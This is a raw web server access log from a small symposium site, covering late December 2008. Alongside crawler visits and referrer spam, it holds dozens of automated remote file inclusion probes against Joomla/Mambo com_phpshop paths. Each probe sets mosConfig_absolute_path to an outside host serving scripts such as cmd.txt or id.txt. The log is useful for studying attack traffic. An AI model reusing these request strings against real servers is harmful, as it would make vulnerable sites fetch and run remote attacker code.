193.47.80.36 - - [25/Dec/2008:19:35:58 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
65.19.156.168 - - [25/Dec/2008:20:11:31 -0500] "GET /logs/error.log/?mosConfig_absolute_path=http://www.tos-belarus.org/data/bjork/cmd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
65.19.156.168 - - [25/Dec/2008:20:11:31 -0500] "GET /?mosConfig_absolute_path=http://www.tos-belarus.org/data/bjork/cmd.txt?? HTTP/1.1" 200 326 "-" "libwww-perl/5.805" 0 www.geil-symposium.com
65.19.156.168 - - [25/Dec/2008:20:11:32 -0500] "GET /logs/?mosConfig_absolute_path=http://www.tos-belarus.org/data/bjork/cmd.txt?? HTTP/1.1" 200 450 "-" "libwww-perl/5.805" 0 www.geil-symposium.com
67.195.37.115 - - [25/Dec/2008:20:28:46 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.115 - - [25/Dec/2008:20:28:46 -0500] "GET /logs/access.log.20081202.gz HTTP/1.0" 200 52932 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.52 - - [25/Dec/2008:22:58:08 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.0.197.0; (R1 1.5); .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 0 www.geil-symposium.com
220.181.32.49 - - [25/Dec/2008:23:19:05 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
208.111.154.15 - - [25/Dec/2008:23:28:13 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [25/Dec/2008:23:28:13 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
124.115.0.138 - - [25/Dec/2008:23:32:06 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
124.115.0.138 - - [25/Dec/2008:23:32:07 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
38.99.13.124 - - [26/Dec/2008:06:30:59 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
198.68.180.60 - - [26/Dec/2008:16:25:09 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/12/14/2223639/id3.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.69" 0 www.geil-symposium.com
198.68.180.60 - - [26/Dec/2008:16:25:09 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/12/14/2223639/id3.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.69" 0 www.geil-symposium.com
198.68.180.60 - - [26/Dec/2008:16:25:09 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/12/14/2223639/id3.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.69" 0 www.geil-symposium.com
201.130.79.57 - - [26/Dec/2008:16:30:00 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.yenko.net/ubbthreads_old/languages/cmdnewscan.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
201.130.79.57 - - [26/Dec/2008:16:30:00 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.yenko.net/ubbthreads_old/languages/cmdnewscan.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
201.130.79.57 - - [26/Dec/2008:16:30:00 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.yenko.net/ubbthreads_old/languages/cmdnewscan.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
220.181.32.49 - - [26/Dec/2008:16:51:32 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
208.111.154.15 - - [26/Dec/2008:17:45:10 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [26/Dec/2008:17:45:10 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
86.58.154.237 - - [26/Dec/2008:18:49:39 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.becabioinfo.org/bbrweb//contenido/cronjobs/idrfi.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
86.58.154.237 - - [26/Dec/2008:18:49:39 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.becabioinfo.org/bbrweb//contenido/cronjobs/idrfi.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
86.58.154.237 - - [26/Dec/2008:18:49:39 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.becabioinfo.org/bbrweb//contenido/cronjobs/idrfi.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
208.80.194.51 - - [26/Dec/2008:18:50:49 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR Enabled; SIMBAR={DA846BDB-2C89-4493-9D50-CAB409377F7C}; FunWebProducts; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
98.213.100.93 - - [26/Dec/2008:18:52:41 -0500] "GET / HTTP/1.0" 200 310 "http://fepouak.977mb.com/florida-life-insurance-brokerages.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6" 0 www.geil-symposium.com
98.213.100.93 - - [26/Dec/2008:18:52:42 -0500] "GET / HTTP/1.0" 200 310 "http://fepouak.977mb.com/florida-life-insurance-brokerages.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6" 0 www.geil-symposium.com
98.213.100.93 - - [26/Dec/2008:18:52:42 -0500] "GET / HTTP/1.0" 200 310 "http://fepouak.977mb.com/florida-life-insurance-brokerages.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6" 0 www.geil-symposium.com
98.213.100.93 - - [26/Dec/2008:18:52:43 -0500] "GET / HTTP/1.0" 200 310 "http://fepouak.977mb.com/florida-life-insurance-brokerages.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6" 0 www.geil-symposium.com
24.185.63.73 - - [26/Dec/2008:18:52:43 -0500] "GET / HTTP/1.0" 200 310 "http://liypoji.007sites.com/50-75-burial-insurance.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051019 Flock/0.4 Firefox/1.0+" 0 www.geil-symposium.com
24.185.63.73 - - [26/Dec/2008:18:52:44 -0500] "GET / HTTP/1.0" 200 310 "http://liypoji.007sites.com/50-75-burial-insurance.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051019 Flock/0.4 Firefox/1.0+" 0 www.geil-symposium.com
24.185.63.73 - - [26/Dec/2008:18:52:45 -0500] "GET / HTTP/1.0" 200 310 "http://liypoji.007sites.com/50-75-burial-insurance.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051019 Flock/0.4 Firefox/1.0+" 0 www.geil-symposium.com
24.185.63.73 - - [26/Dec/2008:18:52:46 -0500] "GET / HTTP/1.0" 200 310 "http://liypoji.007sites.com/50-75-burial-insurance.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051019 Flock/0.4 Firefox/1.0+" 0 www.geil-symposium.com
72.30.79.47 - - [26/Dec/2008:19:27:39 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.79.47 - - [26/Dec/2008:19:27:39 -0500] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.79.47 - - [26/Dec/2008:19:27:39 -0500] "GET /logs/ HTTP/1.0" 200 438 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.79.47 - - [26/Dec/2008:19:35:13 -0500] "GET /logs/error.log HTTP/1.0" 200 163550 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.41 - - [26/Dec/2008:22:42:16 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/hspr-H102; Blazer/4.0) 16;320x320" 0 www.geil-symposium.com
83.222.23.200 - - [27/Dec/2008:00:04:13 -0500] "GET /logs/error.log///components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.suports.es/UserFiles/File/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
83.222.23.200 - - [27/Dec/2008:00:04:14 -0500] "GET ///components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.suports.es/UserFiles/File/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
83.222.23.200 - - [27/Dec/2008:00:04:14 -0500] "GET /logs///components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.suports.es/UserFiles/File/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
220.181.32.49 - - [27/Dec/2008:02:38:43 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
208.111.154.15 - - [27/Dec/2008:03:02:18 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [27/Dec/2008:03:02:18 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
61.135.168.39 - - [27/Dec/2008:05:09:33 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
220.181.32.22 - - [27/Dec/2008:05:11:11 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
79.111.88.56 - - [27/Dec/2008:07:36:28 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" 0 www.geil-symposium.com
72.30.79.47 - - [27/Dec/2008:08:10:47 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.79.47 - - [27/Dec/2008:08:10:47 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.79.47 - - [27/Dec/2008:10:37:38 -0500] "GET /logs/access.log.20081202.gz HTTP/1.0" 200 52932 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
220.181.32.77 - - [27/Dec/2008:13:05:02 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
220.181.32.49 - - [27/Dec/2008:13:05:38 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
67.18.151.242 - - [27/Dec/2008:14:01:18 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.northshoredojo.net/images/footer.txt? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" 0 www.geil-symposium.com
67.18.151.242 - - [27/Dec/2008:14:01:18 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.northshoredojo.net/images/footer.txt? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" 0 www.geil-symposium.com
208.80.194.45 - - [27/Dec/2008:19:12:58 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; IEMB3; .NET CLR 3.0.04506.30; IEMB3)" 0 www.geil-symposium.com
66.249.71.104 - - [27/Dec/2008:19:18:20 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.105 - - [27/Dec/2008:19:18:20 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
220.181.32.22 - - [27/Dec/2008:20:12:10 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
220.181.61.192 - - [27/Dec/2008:21:19:29 -0500] "GET / HTTP/1.1" 200 326 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 0 www.geil-symposium.com
61.135.168.39 - - [27/Dec/2008:22:10:32 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
208.80.194.54 - - [27/Dec/2008:22:45:19 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; BT Openworld BB; YPC 3.2.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
208.111.154.15 - - [27/Dec/2008:23:32:29 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [27/Dec/2008:23:32:30 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
72.3.229.49 - - [27/Dec/2008:23:49:57 -0500] "GET /logs/error.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.techbidders.com/upload/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
72.3.229.49 - - [27/Dec/2008:23:49:57 -0500] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.techbidders.com/upload/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
72.3.229.49 - - [27/Dec/2008:23:49:57 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.techbidders.com/upload/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
64.246.185.2 - - [28/Dec/2008:00:12:02 -0500] "GET /logs/error.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.techbidders.com/upload/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" 0 www.geil-symposium.com
64.246.185.2 - - [28/Dec/2008:00:12:03 -0500] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.techbidders.com/upload/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" 0 www.geil-symposium.com
64.246.185.2 - - [28/Dec/2008:00:12:03 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.techbidders.com/upload/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" 0 www.geil-symposium.com
64.151.255.1 - - [28/Dec/2008:00:20:50 -0500] "GET /logs/error.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.techbidders.com/upload/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
64.151.255.1 - - [28/Dec/2008:00:20:50 -0500] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.techbidders.com/upload/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
64.151.255.1 - - [28/Dec/2008:00:20:50 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.techbidders.com/upload/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
124.115.0.102 - - [28/Dec/2008:00:37:18 -0500] "GET /robots.txt HTTP/1.1" 404 - "http://www.geil-symposium.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
24.209.122.237 - - [28/Dec/2008:00:51:40 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/genericviagranow" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
71.91.56.210 - - [28/Dec/2008:00:51:43 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/Buyviagra2009" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6" 0 www.geil-symposium.com
24.209.122.237 - - [28/Dec/2008:00:51:47 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/genericviagranow" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
71.91.56.210 - - [28/Dec/2008:00:51:47 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/Buyviagra2009" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6" 0 www.geil-symposium.com
24.209.122.237 - - [28/Dec/2008:00:51:50 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/genericviagranow" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
71.91.56.210 - - [28/Dec/2008:00:51:50 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/Buyviagra2009" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6" 0 www.geil-symposium.com
24.209.122.237 - - [28/Dec/2008:00:51:54 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/genericviagranow" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
71.91.56.210 - - [28/Dec/2008:00:51:57 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/Buyviagra2009" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6" 0 www.geil-symposium.com
65.98.70.18 - - [28/Dec/2008:01:05:23 -0500] "GET /logs/error.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.techbidders.com/upload/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" 0 www.geil-symposium.com
65.98.70.18 - - [28/Dec/2008:01:05:23 -0500] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.techbidders.com/upload/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" 0 www.geil-symposium.com
65.98.70.18 - - [28/Dec/2008:01:05:23 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.techbidders.com/upload/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" 0 www.geil-symposium.com
65.98.70.18 - - [28/Dec/2008:01:16:33 -0500] "GET /logs/error.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.techbidders.com/upload/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" 0 www.geil-symposium.com
65.98.70.18 - - [28/Dec/2008:01:16:33 -0500] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.techbidders.com/upload/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" 0 www.geil-symposium.com
65.98.70.18 - - [28/Dec/2008:01:16:33 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.techbidders.com/upload/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" 0 www.geil-symposium.com
220.181.32.49 - - [28/Dec/2008:03:39:53 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
210.59.227.15 - - [28/Dec/2008:05:27:48 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.rtk-ld.ru//assets/cache/.../id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.811" 0 www.geil-symposium.com
210.59.227.15 - - [28/Dec/2008:05:27:48 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.rtk-ld.ru//assets/cache/.../id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.811" 0 www.geil-symposium.com
210.59.227.15 - - [28/Dec/2008:05:27:48 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.rtk-ld.ru//assets/cache/.../id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.811" 0 www.geil-symposium.com
77.222.40.42 - - [28/Dec/2008:06:49:22 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://harasyeen.webs.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
77.222.40.42 - - [28/Dec/2008:06:49:22 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://harasyeen.webs.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
77.222.40.42 - - [28/Dec/2008:06:49:23 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://harasyeen.webs.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
38.99.13.124 - - [28/Dec/2008:06:57:05 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
209.51.153.114 - - [28/Dec/2008:07:25:08 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" 0 www.geil-symposium.com
209.51.153.114 - - [28/Dec/2008:07:25:08 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" 0 www.geil-symposium.com
209.51.153.114 - - [28/Dec/2008:07:25:08 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" 0 www.geil-symposium.com
66.160.185.20 - - [28/Dec/2008:07:33:17 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" 0 www.geil-symposium.com
66.160.185.20 - - [28/Dec/2008:07:33:17 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" 0 www.geil-symposium.com
66.160.185.20 - - [28/Dec/2008:07:33:17 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" 0 www.geil-symposium.com
200.107.138.34 - - [28/Dec/2008:08:03:42 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
200.107.138.34 - - [28/Dec/2008:08:03:42 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
200.107.138.34 - - [28/Dec/2008:08:03:42 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
200.107.138.34 - - [28/Dec/2008:08:03:43 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
200.107.138.34 - - [28/Dec/2008:08:03:43 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
200.107.138.34 - - [28/Dec/2008:08:03:44 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
221.229.126.149 - - [28/Dec/2008:08:32:30 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
221.229.126.149 - - [28/Dec/2008:08:32:30 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
